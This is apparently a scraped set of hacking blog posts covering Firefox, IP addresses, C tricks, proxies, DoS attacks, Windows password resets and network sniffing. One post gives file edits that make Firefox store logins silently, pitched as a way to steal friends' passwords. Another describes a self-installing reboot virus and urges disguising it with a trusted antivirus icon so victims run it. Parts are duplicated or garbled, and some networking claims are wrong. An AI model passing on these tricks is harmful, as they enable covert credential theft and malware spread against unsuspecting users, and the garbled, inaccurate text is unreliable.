Auto Save Passwords Without Notification in Firefox
Hello guys, Today i am going to write about a simple firefox hack
which helps you to hack your friends easily. When ever you try to login
in any account, firefox shows a notification asking for store user name
and password for this website. But after using this trick it will never
ask to store the password but it would automatically store all the
password. Its ideal trick if you want to get someones login details who
uses your computer.
follow these steps:
1) First of all you need to close firefox.
2) Now locate the nsloginmanagerprompter.js file which is normally found in
C:\ProgramFiles\MozillaFirefox\Components\
3) Open nsloginmanagerprompter.js with notepad or other editor. But the editor which would show the line number will be ideal.
4) Replace the entire line 804 to 869 with the following code
var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);
After replacing this, save this file
Now it’s done. yeppie….
To see the usernames + passwords, go to tools –> options –> security –> saved password

Private and Public IP Addresses: What’s the Difference?
In this post I will try to explain the difference between a public and a private IP address in layman’s terms so that it becomes simple and easy to understand.
What are Public IP Addresses?
A public IP address is assigned to every
computer that connects to the Internet where each IP is unique. In this
case, there cannot exist two computers with the same public IP address
all over the Internet. This addressing scheme makes it possible for
the computers to “find each other” online and exchange information. User
has no control over the IP address (public) that is assigned to the
computer. The public IP address is assigned to the computer by the
Internet Service Provider as soon as the computer is connected to the
Internet gateway.
A public IP address can be either static or dynamic.
A static public IP address does not change and is used primarily for
hosting web pages or services on the Internet. On the other hand, a
dynamic public IP address is chosen from a pool of available addresses
and changes each time one connects to the Internet.
Most Internet users will only have a
dynamic IP assigned to their computer which goes off when the computer
is disconnected from the Internet. Thus when it is re-connected it gets a
new IP.
You can check your public IP address by visiting www.whatismyip.comWhat are Private IP Addresses?
An IP address is considered private if
the IP number falls within one of the IP address ranges reserved for
private networks such as a Local Area Network (LAN). The Internet
Assigned Numbers Authority (IANA) has reserved the following three
blocks of the IP address space for private networks (local networks):
10.0.0.0 – 10.255.255.255 (Total Addresses: 16,777,216)
172.16.0.0 – 172.31.255.255 (Total Addresses: 1,048,576)
192.168.0.0 – 192.168.255.255 (Total Addresses: 65,536)
172.16.0.0 – 172.31.255.255 (Total Addresses: 1,048,576)
192.168.0.0 – 192.168.255.255 (Total Addresses: 65,536)
Private
IP addresses are used for numbering the computers in a private network
including home, school and business LANs in airports and hotels which
makes it possible for the computers in the network to communicate with
each other.
Say for example, if a network X consists of 10 computers, each of them can be given an IP starting from 192.168.1.1 to 192.168.1.10. Unlike
the public IP, the administrator of the private network is free to
assign an IP address of his own choice (provided the IP number falls in
the private IP address range as mentioned above).
Devices
with private IP addresses cannot connect directly to the Internet.
Likewise, computers outside the local network cannot connect directly to
a device with a private IP. It is possible to interconnect two private
networks with the help of a router or a similar device that supports Network Address Translation.
If the
private network is connected to the Internet (through an Internet
connection via ISP), then each computer will have a private IP as well
as a public IP. Private IP is used for communication within the network
where as the public IP is used for communication over the Internet. Most
Internet users with a DSL/ADSL connection will have both a private as
well as a public IP.
You can know your private IP by typing ipconfig command in the command prompt. The number that you see against “IPV4 Address:” is your private IP which in most cases will be 192.168.1.1 or 192.168.1.2. Unlike the public IP, private IP addresses are always static in nature.
Common Myth about Private IP Address:
Most
people assume that a private IP is the one used for stealth Internet
activities and hence cannot be detected. But this is NOT TRUE!.
Unlike what most people think, a private
IP address (unlike the private telephone number) is just like any other
IP address that belongs to a private network. In reality, there is no
public IP address that is impossible to trace as the protocol itself is
designed for transparency.
C Program to Print its Own Source Code
Here’s the program:
#include<stdio.h>
char *program=”#include<stdio.h>%cchar *program=%c%s%c;%cvoid main()%c{%cprintf(program,10,34,program,34,10, 10,10,10);%c}”;
void main()
{
printf(program,10,34,program,34,10,10,10,10);
}
char *program=”#include<stdio.h>%cchar *program=%c%s%c;%cvoid main()%c{%cprintf(program,10,34,program,34,10, 10,10,10);%c}”;
void main()
{
printf(program,10,34,program,34,10,10,10,10);
}
C Program Without a Main Function
Have you ever wondered how to write a C program without a main function? Can a C program execute with a main function? Is it possible to do that?
Well, the answer is YES! There can be a C program without a main function. Here is the source code of the program without a main function:
#include<stdio.h>
#include<conio.h>
#define decode(s,t,u,m,p,e,d) m##s##u##t
#define begin decode(a,n,i,m,a,t,e)
int begin()
{
printf(” hello “);
getch();
return 0;
}
save this as test.c
#include<conio.h>
#define decode(s,t,u,m,p,e,d) m##s##u##t
#define begin decode(a,n,i,m,a,t,e)
int begin()
{
printf(” hello “);
getch();
return 0;
}
save this as test.c
The above program runs perfectly fine
even without a main function. But how? What’s the logic behind it? How
can we have a C program working without a main function. Read on to find
out the answer…
Here, we are using a preprocessor directive called #define
with arguments to give an impression that the program runs without the
main function. However, in reality it runs with a hidden main function
in it.
NOTE: A Preprocessor is program which processes the source code before compilation.
The ‘##‘ operator is
called the token pasting or token merging operator. That is, we can
merge two or more characters with it. Now, look at the 2nd line of
program:
#define decode(s,t,u,m,p,e,d) m##s##u##t
What is the preprocessor doing here? The macro decode(s,t,u,m,p,e,d) is being expanded as “msut” (The ## operator merges m, s, u and t into msut). The logic is, when you pass (s,t,u,m,p,e,d) as argument it merges the 4th, 1st, 3rd and the 2nd characters (tokens).
Now, look at the third line of the program:
#define begin decode(a,n,i,m,a,t,e)
Here the preprocessor replaces the macro
“begin” with the expansion decode(a,n,i,m,a,t,e). According to the
macro definition in the previous line, the argument must be expanded so
that the 4th, 1st, 3rd and the 2nd characters must be merged. In the
argument (a,n,i,m,a,t,e) 4th, 1st, 3rd and the 2nd characters are ‘m’,
‘a’, ‘i’ and ‘n’.
So the third line “int begin” is
replaced by “int main” by the preprocessor before the program is passed
on to the compiler. That’s it.
The bottom line is that, there can never
exist a C program without a main function. Here, we are just playing a
gimmick that makes us believe that the program runs without the main,
but there actually exists a hidden main function in the program. Here,
we are using the proprocessor directive to intelligently replace the
word “begin” by “main”. In simple words: int begin = int main.
A Virus Program to Restart the Computer with c
For this, the virus needs to be executed
only once and from then on, it will carry out rest of the operation on
its own. I have programmed this virus using the C language. If you are
familiar with the C language then it is too easy to
understand the logic behind the coding. The code is not posted here in
this article, but you can download it from the link below.
Compiling the source code into an executable module:
-
Download the Source Code Here.
-
UnRar the file and you should see the source code: Sysres.C
Testing and removing the virus from your PC:
You can compile and test this virus on your own PC without any fear. To test, just double-click the sysres.exe
file and restart the system manually. From now on, every time the PC is
booted and the desktop is loaded, your PC will restart automatically
again and again.
It will not do any harm apart from
automatically restarting your system. After testing it, you can remove
the virus by following the below mentioned steps:
-
Reboot your computer in the safe mode.
-
Go to:(%systemroot% can be C,D,E or F)%systemroot%\Windows\System
-
You will find a file by name sysres.exe, delete it.
-
Type regedit in run. You will go to the registry editor. Here navigate to:HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\RunThere, on the right site you will see an entry by name “sres“. Delete this entry. That’s it. You have now removed this virus successfully.
Logic Behind the working of this virus program:
If I do not explain the logic(Algorithm) behind the working of the virus program, I think this post would become an incomplete one. So I’ll explain the logic in a simplified manner without getting much into the technical aspects of the program. If you have further doubts, you can pass your comments.
LOGIC:
-
First the virus will find the Root partition (Partition on which Windows is installed).
-
Next, it will determine whether or not the virus file (sysres.exe) is already copied into %systemroot%\Windows\System.
-
If not it will just place a copy of itself into %systemroot%\Windows\System and makes a registry entry to put this virus file into the Windows startup.
-
Or else if the virus is already found in the %systemroot%\Windows\System directory (folder), then it just gives a command to restart the computer.
This process is repeated every time the PC is restarted.
NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.
How to change the icon of the executable module (This step is optional):
After you compile, the sysres.exe file that you get will have a default icon.
If you send this file to your friends they may not execute it since it
has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.
For example, you can change the icon into Norton antivirus ICON itself so that the people seeing this file believes that it is Norton antivirus. Or you can change its ICON into the ICON of any popular or trusted programs so that people will definitely click on it.
How to Compile C Programs
Here is a step-by-step procedure to install Borland C++ compiler 5.5 on your PC and compile the C programs.
How to Install Borland C++ compiler?
Follow the below steps to install Borland C++ compiler 5.5 on your PC:
-
Download Borland C++ compiler 5.5 (for Windows platform) from the following link:
-
After you download, run the file C++5.51.exe. The default installation path would be:C:\Borland\BCC55
How to configure Borland C++ compiler?
Here is a step-by-step instruction on how to configure the compiler:
-
After you install Borland C++ compier, create two new Text Documents.
-
Open the first New Text Document.txt file and add the following two lines into it :-I”c:\Borland\Bcc55\include”-L”c:\Borland\Bcc55\lib”Save changes and close the file. Now rename the file from New Text Document.txt to bcc32.cfg.
-
Open the second New Text Document (2).txt file and add the following line into it:-L”c:\Borland\Bcc55\lib”Save changes and close the file. Rename the file from New Text Document (2).txt to ilink32.cfg.
-
Now copy the two files bcc32.cfg and ilink32.cfg, navigate to C:\Borland\BCC55\Bin and paste them.
How to Compile the C Source Code (.C files)?
Here is a detailed instruction on how to compile C source codes:
-
You need to place the .C (example.c) file to be compiled in the following location:
-
Now go to the command prompt (Start->Run->type cmd->Enter)
-
Make the following path as the present working directory (use the CD command):
-
To compile the file (example.c) use the following command:bcc32 example.c
-
Now if there exists no error in the source code, you’ll get a compiled executable module (example.exe) in the same location (C:\Borland\BCC55\Bin).
-
Now you have successfully compiled the source code into an executable file(.exe file).
C:\Borland\BCC55\Bin
C:\Borland\BCC55\Bin
NOTE: The above tutorial assumes that you’ve installed the compiler onto the C: drive (by default).
Ways to Hide IP Address Online
One of the most popular and easy ways to hide your IP address online is to use a proxy server. In simple words, a proxy server
is any server that will act as an intermediary between your computer
and the Internet. Instead of communicating directly with the websites or
Internet resources, here you communicate with the proxy server which
then forwards all your requests to the remote server so as to establish a
back and forth communication between your computer and the Internet.
So, whenever you are hiding behind a proxy, the Internet or the websites
you visit will only see the IP address of the proxy server, so that
your real IP address is kept hidden. For more information on proxy
servers, you may refer my earlier post on what is a proxy server and how it works?
Types of Web Proxies
Here is a list of different types of web proxies that you can try:
Website Based Proxy Servers:
This is the simplest of all methods.
There are many websites on the Internet that provide free and paid proxy
service for the users without having to install any piece of software
program on their computer. The following are some of the popular
websites that offer proxy service:
The above websites provide a field to
enter the URL of the target website that you want to visit anonymously.
Once you submit, they will establish a connection with the target site
and presents you back with the intended page that you are trying to
browse. The downside of using these free services is that, some of them
will not offer a secured connection (SSL) and you will often be
presented with annoying ads and pop-ups during the course of your
browsing. However, you can avoid these by becoming a paid user.
Browser Configured Proxy Servers:
There are hundreds of freely available
open proxies that can be found on the Internet. You can obtain the IP
address of one of those freely available proxy servers and configure
your browser to start using them. However, as they are openly available
to public, most of them are either bottlenecked or perform too slow on
normal conditions.
Program Based Proxy Servers:
A program based proxy server requires you
to install a program on your computer and configure its settings. These
provide you with an option to start hiding your IP address with just a
click of a button. They automatically connect your computer to a private
high speed anonymous proxy server to provide best performance. You also
have the option to choose proxies based on location such as countries.
The advantage of using this type of proxy is that, it is not limited to a
single browser. That means, your computer’s entire web traffic is
routed through the proxy, there by guaranteeing you with a highest level
of privacy.
Most of these programs come with a free
trial where you are required to pay once the trial period expires. The
following are some of the popular program based web proxies:
VPN Services:
VPN services provide reliable ways not
only to hide your IP address but also to protect your data and identity
over the Internet. Here are a few examples of VPN services that you can
try:
What is a Proxy Server and How it Works?
In a computer network, a proxy server
is any computer system offering a service that acts as an intermediary
between the two communicating parties, the client and the server. In the
presence of a proxy server, there is no direct communication between
the client and the server. Instead, the client connects to the proxy
server and sends requests for resources such as a document, web page or a
file that resides on a remote server. The proxy server handles this
request by fetching the required resources from the remote server and
forwarding the same to the client.
How Proxy Server Works?
An illustration of how a proxy server works is shown below:
As shown in the above example, whenever
the client connects to a web proxy server and makes a request for the
resources (in this case, “Sample.html”) that reside on a remote server
(in this case, xyz.com), the proxy server forwards this request to the
target server on behalf of the client, so as to fetch the requested
resource and deliver it back to the client. An example of client can be a
user operated computer that is connected to the Internet.
Types of Proxy Servers and their Uses:
1. Forward Proxies
A forward proxy is the same one described
above where the proxy server forwards the client’s request to the
target server to establish a communication between the two. Here the
client specifies the resources to be fetched and the target server to
connect to, so that the forward proxy server acts accordingly. Except
for reverse proxy (discussed in the latter part of this article), all other types of proxy servers described in this article falls under forward proxy.
2. Open Proxy
An open proxy is a type of forwarding proxy
that is openly available to any Internet user. Most often, an open
proxy is used by Internet users to conceal their IP address so that they
remain anonymous during their web activity. The following are some of
the web proxies that fall under the category of open proxy:
Anonymous Proxy
An anonymous proxy is a
type of open proxy that conceals IP address of Internet users so that
the target server cannot identify the origin of the requesting client.
However, an anonymous proxy identifies itself as a proxy server but
still manages to maintain the anonymity of the users.
Distorting Proxy
This type of proxy server identifies itself as a proxy, but reveals an incorrect IP address of the client to the target server.
High Anonymity Proxy (Elite Proxy)
An elite proxy provides
maximum anonymity as it neither identifies itself as a proxy nor reveals
the original IP address of the client. In most cases, users have to pay
for this type of proxy as it is seldom available freely on the
Internet.
3. Reverse Proxy
Unlike a forwarding proxy where the client knows that it is connecting through a proxy, a reverse proxy
appears to the client as an ordinary server. However, when the client
requests resources from this server, it forwards those requests to the
target server (actual server where the resources reside) so as to fetch
back the requested resource and forward the same to the client. Here,
the client is given an impression that it is connecting to the actual
server, but in reality there exists a reverse proxy residing between the
client and the actual server.
Reverse proxies are often used to reduce load on the actual server by load balancing,
to enhance security and to cache static content, so that they can be
served faster to the client. Often big companies like Google which gets a
large number of hits maintain a reverse proxy so as to enhance the
performance of their servers. It is not a surprise that whenever you are
connecting to google.com, you are only connecting to a reverse proxy
that forwards your search queries to the actual servers to return the
results back to you.
What is Denial of Service (DoS) Attack?
If you are working in the field of
computer networks or an enthusiast in the field of network security, you
are sure to have come across the term “Denial of Service attack”
which is simply referred to as “DoS attack”. Today, this is one of the
most common types of network attacks carried out on the Internet. In
this post, I will try to explain DoS attack, its variants and methods
involved to carry out the same in an easily understandable manner.
What is a DOS Attack?
Denial of Service or DoS attack is a
type of network attack designed to flood the target network or machine
with a large amount of useless traffic so as to overload it and
eventually bring it down to its knees. The main intention behind DoS
attack is to make the services running on the target machine (such as a
website) temporarily unavailable to its intended users. DoS attacks are
usually carried out on web servers that host vital services such as
banking, e-commerce or credit card processing.
A common variant of DOS attack known as DDoS (Distributed Denial of Service)
attack has become quite popular in the recent days as it is more
powerful and hard to detect. A typical DoS attack has a single place of
origin while a DDoS attack originates from multiple IP addresses
distributed across two or more different network. The working of a DDoS
attack is shown in the following diagram:
Unlike a DoS attack where the attacker
uses one single computer or a network to attack the target, a DDoS the
attack originates from different pre-compromised computers belonging to
different networks. As the attacker uses a number of computer systems
from different networks each residing in different geographical
locations, the incoming traffic looks natural and therefore becomes hard
to detect.
Protection Against DoS/DDoS Attacks:
DoS attacks can easily be handled by
blacklisting the target IP (or range of IPs) that are found to be making
too many requests/connections (in an unnatural way) to the server.
However, DDoS attacks are complicated as the incoming requests seem more
natural and distributed. In this case it is hard to find the difference
between the genuine and malicious traffic. Taking an action at the
firewall level to blacklist suspected IPs may result in false positives
and therefore may affect the genuine traffic as well.
Methods Involved in DoS Attack:
The following are some of the commonly employed methods in carrying out a DoS attack:
- SYN Flood Attack
- Ping Flood Attack (Ping of Death)
- Teardrop Attack
- Peer-to-Peer Attacks
How to Hack Windows Administrator Password
This post will show you how to hack Windows administrator password at times when you forget it or when you want to gain access to a computer for which you do not know the password.
Most of us have experienced a situation
where in we need to gain access to a computer which is password
protected or at times we may forget the administrator password without
which it becomes impossible to log in to the computer. So, if you are
somewhat in a same kind of situation, here is an excellent hack using
which you can reset the password or make the password empty (remove the
password) so that you can gain administrator access to the computer.
Hacking the Windows Admin Password:
You can do this with a small tool called Offline NT Password & Registry Editor.
This utility works offline, that means you need to shut down your
computer and boot off your using a floppy disk, CD or USB device (such
as pen drive). The tool has the following features:
- You do not need to know the old password to set a new one.
- This tool can detect and unlock locked or disabled out user accounts!
- There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.
How it Works?
Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config.
This file is a part of Windows registry and remains inaccessible as
long as the OS is active. Hence, it is necessary that you boot off your
computer and access this sam file via the boot menu.
This tool intelligently gains access to this file and will reset/remove
the password associated with administrator or any other account.
The download link for both CD and floppy drives along with the complete instructions is given below:
It is recommended that you download the
CD version of the tool since the floppy drive is outdated or doesn’t
exist in today’s computer. After the download, you’ll get a bootable
image which you need to burn it onto a blank CD. Now, boot your computer
from this CD and follow the screen instructions to reset the password.
Another Simple Way to Reset Non-Administrator Account Passwords:
Here is another simple way through which
you can reset the password of any non-administrator accounts. The only
requirement for this is that you need to have administrator privileges.
Here is a step-by-step instruction to accomplish this task:
-
Open the command prompt (Start -> Run -> type cmd -> Enter)
-
Now type net user and hit Enter
-
Now the system will show you a list of user accounts on the computer. Say for example, you need to reset the password of the account by name John, then do as follows:
-
Type net user John * and hit Enter. Now, the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.
So, in this way you can reset the
password of any Windows account at times when you forget it so that you
need not re-install your OS for any reason. I hope this helps.
Hack any LAN or Wi-Fi Connected Computer Using 'Cain & Abel' Sniffer Tool!
Do you know what you are typing
when using internet is passing through the same network that someone else using! So, he can
easily hack your information using some kind of network sniffing software and
analyzer. Now doesn’t matter this is Wi-Fi or LAN.
Hack user
information by sniffing network is a very popular hacking technique since then.
Hackers call this technique ‘Man in Middle Attack’.
What you can get by sniffing a network?
Wi-Fi hotspot
password
Browser
saved password
Email
password
Browsing
session history
And data
uses information
Tools to
be used to sniff a network:
1. Cain
& Abel
2. Namp
